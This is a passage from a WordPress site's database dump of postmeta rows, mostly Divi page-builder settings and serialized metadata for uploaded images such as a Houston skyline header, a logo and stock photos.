20:04:15'),(2042,38,'_et_pb_show_page_creation','off'),(1978,523,'_et_pb_use_builder','on'),(1979,523,'_et_pb_show_page_creation','off'),(2007,528,'_et_pb_ab_subjects',''),(2008,528,'_et_pb_enable_shortcode_tracking',''),(2006,528,'_et_pb_built_for_post_type','page'),(1900,506,'_edit_lock','1679859402:1'),(1838,478,'_wp_trash_meta_status','publish'),(1839,478,'_wp_trash_meta_time','1679589301'),(1815,468,'_wp_attached_file','2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg'),(1816,468,'_wp_attachment_metadata','a:8:{s:5:\"width\";i:2560;s:6:\"height\";i:957;s:4:\"file\";s:58:\"2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\";s:8:\"filesize\";i:419263;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:51:\"Header-New-3-22-2023-Color-Adjusted-USE-300x112.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:112;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29649;}s:5:\"large\";a:5:{s:4:\"file\";s:52:\"Header-New-3-22-2023-Color-Adjusted-USE-1024x383.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:383;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93872;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:51:\"Header-New-3-22-2023-Color-Adjusted-USE-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27085;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:51:\"Header-New-3-22-2023-Color-Adjusted-USE-768x287.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:287;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64337;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:52:\"Header-New-3-22-2023-Color-Adjusted-USE-1536x574.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:574;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:175027;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:52:\"Header-New-3-22-2023-Color-Adjusted-USE-2048x765.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:765;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:282022;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:51:\"Header-New-3-22-2023-Color-Adjusted-USE-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42734;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:52:\"Header-New-3-22-2023-Color-Adjusted-USE-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:154604;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:51:\"Header-New-3-22-2023-Color-Adjusted-USE-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45112;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:51:\"Header-New-3-22-2023-Color-Adjusted-USE-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60619;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:52:\"Header-New-3-22-2023-Color-Adjusted-USE-1080x404.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:404;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102164;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:51:\"Header-New-3-22-2023-Color-Adjusted-USE-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61143;}s:37:\"et-pb-post-main-image-fullwidth-large\";a:5:{s:4:\"file\";s:53:\"Header-New-3-22-2023-Color-Adjusted-USE-2880x1800.jpg\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:824234;}s:32:\"et-pb-image--responsive--desktop\";a:5:{s:4:\"file\";s:52:\"Header-New-3-22-2023-Color-Adjusted-USE-1280x479.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:479;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:130885;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:51:\"Header-New-3-22-2023-Color-Adjusted-USE-980x366.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:366;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88575;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:51:\"Header-New-3-22-2023-Color-Adjusted-USE-480x179.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:179;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40141;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"11\";s:6:\"credit\";s:24:\"Ramiro - stock.adobe.com\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark IV\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1530737242\";s:9:\"copyright\";s:15:\"REYNAPHOTO 2018\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:2:\"50\";s:13:\"shutter_speed\";s:1:\"6\";s:5:\"title\";s:58:\"City of Houston Skyline July 4th 2018 with dramatic sunset\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:20:{i:0;s:7:\"skyline\";i:1;s:7:\"houston\";i:2;s:6:\"sunset\";i:3;s:9:\"cityscape\";i:4;s:8:\"panorama\";i:5;s:4:\"city\";i:6;s:5:\"urban\";i:7;s:5:\"night\";i:8;s:12:\"architecture\";i:9;s:8:\"building\";i:10;s:8:\"downtown\";i:11;s:10:\"skyscraper\";i:12;s:4:\"park\";i:13;s:3:\"sky\";i:14;s:10:\"reflection\";i:15;s:3:\"usa\";i:16;s:6:\"travel\";i:17;s:9:\"landscape\";i:18;s:4:\"view\";i:19;s:12:\"longexposure\";}}s:14:\"original_image\";s:43:\"Header-New-3-22-2023-Color-Adjusted-USE.jpg\";s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"82\";s:8:\"quantity\";d:65;s:4:\"webp\";i:0;}}'),(667,198,'_wp_attached_file','2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png'),(668,198,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:63:\"2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\";s:8:\"filesize\";i:233576;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:63:\"Justin-Sutton-rev-1_black_on_transparent_high-res-1-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10397;}s:5:\"large\";a:5:{s:4:\"file\";s:64:\"Justin-Sutton-rev-1_black_on_transparent_high-res-1-1024x683.png\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:45092;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:63:\"Justin-Sutton-rev-1_black_on_transparent_high-res-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5600;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"Justin-Sutton-rev-1_black_on_transparent_high-res-1-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32491;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:65:\"Justin-Sutton-rev-1_black_on_transparent_high-res-1-1536x1024.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:72054;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:65:\"Justin-Sutton-rev-1_black_on_transparent_high-res-1-2048x1365.png\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:98911;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:63:\"Justin-Sutton-rev-1_black_on_transparent_high-res-1-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14158;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:64:\"Justin-Sutton-rev-1_black_on_transparent_high-res-1-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:45942;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:63:\"Justin-Sutton-rev-1_black_on_transparent_high-res-1-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:15711;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:63:\"Justin-Sutton-rev-1_black_on_transparent_high-res-1-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:21814;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:64:\"Justin-Sutton-rev-1_black_on_transparent_high-res-1-1080x720.png\";s:5:\"width\";i:1080;s:6:\"height\";i:720;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47771;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:63:\"Justin-Sutton-rev-1_black_on_transparent_high-res-1-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19745;}s:37:\"et-pb-post-main-image-fullwidth-large\";a:5:{s:4:\"file\";s:65:\"Justin-Sutton-rev-1_black_on_transparent_high-res-1-2880x1800.png\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:142610;}s:32:\"et-pb-image--responsive--desktop\";a:5:{s:4:\"file\";s:64:\"Justin-Sutton-rev-1_black_on_transparent_high-res-1-1280x853.png\";s:5:\"width\";i:1280;s:6:\"height\";i:853;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:57913;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:63:\"Justin-Sutton-rev-1_black_on_transparent_high-res-1-980x653.png\";s:5:\"width\";i:980;s:6:\"height\";i:653;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:42981;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:63:\"Justin-Sutton-rev-1_black_on_transparent_high-res-1-480x320.png\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18802;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"22\";s:8:\"quantity\";d:88;s:4:\"webp\";i:0;}}'),(2909,709,'_wp_old_date','2023-04-04'),(2910,711,'_wp_old_date','2023-04-04'),(2911,707,'_wp_old_date','2023-04-04'),(2908,708,'_wp_old_date','2023-04-04'),(781,240,'_wp_attachment_metadata','a:8:{s:5:\"width\";i:2560;s:6:\"height\";i:1807;s:4:\"file\";s:121:\"2023/03/CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912-scaled.jpg\";s:8:\"filesize\";i:568745;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:114:\"CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39876;}s:5:\"large\";a:5:{s:4:\"file\";s:115:\"CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912-1024x723.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:723;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155438;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:114:\"CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28701;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:114:\"CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912-768x542.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:542;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106798;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:116:\"CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912-1536x1084.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1084;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:270309;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:116:\"CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912-2048x1445.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1445;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:407769;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:114:\"CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48419;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:115:\"CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:153189;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:114:\"CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51584;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:114:\"CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68924;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:115:\"CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912-1080x762.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:762;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:166867;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:114:\"CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73566;}s:37:\"et-pb-post-main-image-fullwidth-large\";a:5:{s:4:\"file\";s:116:\"CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912-2880x1800.jpg\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:624171;}s:32:\"et-pb-image--responsive--desktop\";a:5:{s:4:\"file\";s:115:\"CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912-1280x904.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:904;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:209102;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:114:\"CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912-980x692.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:692;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:146439;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:114:\"CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912-480x339.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:339;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62058;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:24:\"Rymden - stock.adobe.com\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:138:\"Group of young people working or studying together. Hipster team in coworking. Young modern business colleagues. Teamwork. Startup concept\";s:17:\"created_timestamp\";s:10:\"1597083703\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:64:\"Group of young people working or studying together. Hipster team\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:48:{i:0;s:8:\"start-up\";i:1;s:10:\"creativity\";i:2;s:7:\"talking\";i:3;s:8:\"planning\";i:4;s:8:\"coworker\";i:5;s:13:\"concentration\";i:6;s:9:\"gesturing\";i:7;s:7:\"success\";i:8;s:8:\"business\";i:9;s:10:\"confidence\";i:10;s:7:\"meeting\";i:11;s:6:\"modern\";i:12;s:7:\"working\";i:13;s:4:\"team\";i:14;s:12:\"togetherness\";i:15;s:10:\"discussion\";i:16;s:6:\"office\";i:17;s:9:\"expertise\";i:18;s:13:\"brainstorming\";i:19;s:5:\"ideas\";i:20;s:5:\"study\";i:21;s:7:\"project\";i:22;s:7:\"student\";i:23;s:11:\"cooperation\";i:24;s:10:\"assignment\";i:25;s:5:\"exams\";i:26;s:5:\"happy\";i:27;s:6:\"laptop\";i:28;s:8:\"research\";i:29;s:3:\"men\";i:30;s:7:\"reading\";i:31;s:6:\"people\";i:32;s:7:\"friends\";i:33;s:4:\"male\";i:34;s:5:\"young\";i:35;s:6:\"female\";i:36;s:5:\"women\";i:37;s:8:\"together\";i:38;s:8:\"studying\";i:39;s:8:\"teamwork\";i:40;s:7:\"college\";i:41;s:10:\"university\";i:42;s:9:\"education\";i:43;s:8:\"learning\";i:44;s:5:\"group\";i:45;s:11:\"businessman\";i:46;s:13:\"businesswoman\";i:47;s:8:\"students\";}}s:14:\"original_image\";s:106:\"CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912.jpg\";s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"73\";s:8:\"quantity\";d:41;s:4:\"webp\";i:0;}}'),(971,298,'_wp_attached_file','2023/03/Military-Soldier-Veteran-Child-and-Spouse-1000x667-1.jpg'),(2472,694,'_et_pb_custom_css',''),(2473,694,'_et_pb_gutter_width','3'),(2481,694,'_wp_page_template','default'),(2475,694,'_global_colors_info','{}'),(2476,694,'_et_pb_first_image',''),(2458,694,'_edit_lock','1680563824:1'),(2457,694,'_edit_last','1'),(2456,694,'_et_pb_use_builder','on'),(2455,693,'_et_pb_built_for_post_type','page'),(2437,684,'_et_pb_built_for_post_type','page'),(731,225,'_et_pb_post_hide_nav','default'),(732,225,'_et_pb_page_layout','et_no_sidebar'),(733,225,'_et_pb_side_nav','off'),(734,225,'_et_pb_use_builder','on'),(735,225,'_et_pb_first_image',''),(736,225,'_et_pb_truncate_post',''),(737,225,'_et_pb_truncate_post_date',''),(738,225,'_et_pb_old_content',''),(755,225,'_et_pb_show_page_creation','off'),(754,225,'_et_builder_version','VB|Divi|4.20.2'),(747,225,'_et_pb_ab_subjects',''),(748,225,'_et_pb_enable_shortcode_tracking',''),(749,225,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"225\" /]'),(750,225,'_et_pb_custom_css',''),(751,225,'_et_pb_gutter_width','3'),(746,225,'_et_pb_built_for_post_type','page'),(753,225,'_global_colors_info','{}'),(906,280,'_wp_attached_file','2023/03/Life-insurance-heart-concept-1000x712-1.jpg'),(907,280,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:712;s:4:\"file\";s:51:\"2023/03/Life-insurance-heart-concept-1000x712-1.jpg\";s:8:\"filesize\";i:560981;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:51:\"Life-insurance-heart-concept-1000x712-1-300x214.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35708;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:51:\"Life-insurance-heart-concept-1000x712-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25582;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:51:\"Life-insurance-heart-concept-1000x712-1-768x547.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:547;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:118726;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:51:\"Life-insurance-heart-concept-1000x712-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48543;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:52:\"Life-insurance-heart-concept-1000x712-1-1000x675.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:185618;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:51:\"Life-insurance-heart-concept-1000x712-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49704;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:51:\"Life-insurance-heart-concept-1000x712-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72605;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:51:\"Life-insurance-heart-concept-1000x712-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93794;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:51:\"Life-insurance-heart-concept-1000x712-1-980x698.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:698;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:165508;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:51:\"Life-insurance-heart-concept-1000x712-1-480x342.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:342;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62772;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:28:\"Fantasista - stock.adobe.com\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:22:\"Life insurance concept\";s:17:\"created_timestamp\";s:10:\"1421527749\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:22:\"Life insurance concept\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:2:{i:0;s:64:\"insurance, health, care, life, heart, tag, cloud, healthcare, pr\";i:1;s:7:\"collage\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"72\";s:8:\"quantity\";d:64;s:4:\"webp\";i:0;}}'),(713,225,'_edit_last','1'),(714,225,'_wp_page_template','default'),(712,225,'_edit_lock','1680566034:1'),(694,216,'_wp_attached_file','2023/03/justinsuttonheadshotsmall-Black-White.png'),(695,216,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:610;s:6:\"height\";i:578;s:4:\"file\";s:49:\"2023/03/justinsuttonheadshotsmall-Black-White.png\";s:8:\"filesize\";i:141942;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:49:\"justinsuttonheadshotsmall-Black-White-300x284.png\";s:5:\"width\";i:300;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:44100;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:49:\"justinsuttonheadshotsmall-Black-White-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16449;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:49:\"justinsuttonheadshotsmall-Black-White-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:44954;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:49:\"justinsuttonheadshotsmall-Black-White-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:51800;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:49:\"justinsuttonheadshotsmall-Black-White-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:77258;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:49:\"justinsuttonheadshotsmall-Black-White-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:90128;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:49:\"justinsuttonheadshotsmall-Black-White-480x455.png\";s:5:\"width\";i:480;s:6:\"height\";i:455;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:87229;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"12\";s:8:\"quantity\";d:88;s:4:\"webp\";i:0;}}'),(696,217,'_wp_attached_file','2023/03/Seth.jpg'),(697,217,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:610;s:6:\"height\";i:578;s:4:\"file\";s:16:\"2023/03/Seth.jpg\";s:8:\"filesize\";i:123059;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"Seth-300x284.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20333;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"Seth-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15177;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:16:\"Seth-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20855;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:16:\"Seth-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22168;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:16:\"Seth-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27517;}s:35:\"et-pb-gallery-module-image-portrait\"